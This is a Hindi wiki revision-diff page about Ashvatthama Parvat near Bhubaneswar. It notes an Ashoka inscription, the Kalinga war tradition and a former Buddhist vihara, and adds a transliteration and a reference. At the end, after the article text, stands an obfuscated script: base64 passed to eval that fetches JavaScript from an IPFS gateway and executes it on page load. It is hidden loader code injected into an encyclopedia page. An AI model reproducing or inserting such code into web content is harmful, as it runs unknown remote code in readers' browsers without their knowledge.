Difference between revisions of "अश्वत्थामा पर्वत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''अश्वत्थामा पर्वत''' [[भुवनेश्वर]] से 2 मील {{मील|मील=2}} पर स्थित है। इसे 'धवलागिरि की पहाड़ी' नाम से भी जाना जाता है।  
+
'''अश्वत्थामा पर्वत''' [[भुवनेश्वर]] से 2 मील {{मील|मील=2}} पर स्थित है। इसे ''''धवलागिरि की पहाड़ी'''' नाम से भी जाना जाता है।  
*अश्वत्थामा पर्वत में [[मौर्य]] [[अशोक|सम्राट अशोक]] का एक अभिलेख उत्कीर्ण है।  
+
*अश्वत्थामा पर्वत में [[मौर्य]] [[अशोक|सम्राट अशोक]] का एक [[अभिलेख]] उत्कीर्ण है।  
 
*कहते हैं कि [[इतिहास]]-प्रसिद्ध [[कलिंग]] युद्ध जिसने अशोक के हृदय को बदल दिया था, इसी स्थान पर हुआ था।  
 
*कहते हैं कि [[इतिहास]]-प्रसिद्ध [[कलिंग]] युद्ध जिसने अशोक के हृदय को बदल दिया था, इसी स्थान पर हुआ था।  
*[[पर्वत]] पर पहले अश्वत्थामा विहार स्थित था।  
+
*[[पर्वत]] पर पहले '''अश्वत्थामा विहार''' स्थित था।  
 
   
 
   
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 14: Line 14:
 
[[Category:उड़ीसा राज्य]]
 
[[Category:उड़ीसा राज्य]]
 
[[Category:उड़ीसा राज्य के ऐतिहासिक स्थान]]
 
[[Category:उड़ीसा राज्य के ऐतिहासिक स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:48, 4 May 2018

ashvatthama parvat bhuvaneshvar se 2 mil (lagabhag 3.2 ki.mi.) par sthit hai. ise 'dhavalagiri ki paha di' nam se bhi jana jata hai.

  • ashvatthama parvat mean maury samrat ashok ka ek abhilekh utkirn hai.
  • kahate haian ki itihas-prasiddh kaliang yuddh jisane ashok ke hriday ko badal diya tha, isi sthan par hua tha.
  • parvat par pahale ashvatthama vihar sthit tha.

tika tippani aur sandarbh

  • aitihasik sthanavali| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar, prishth sankhya- 51

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>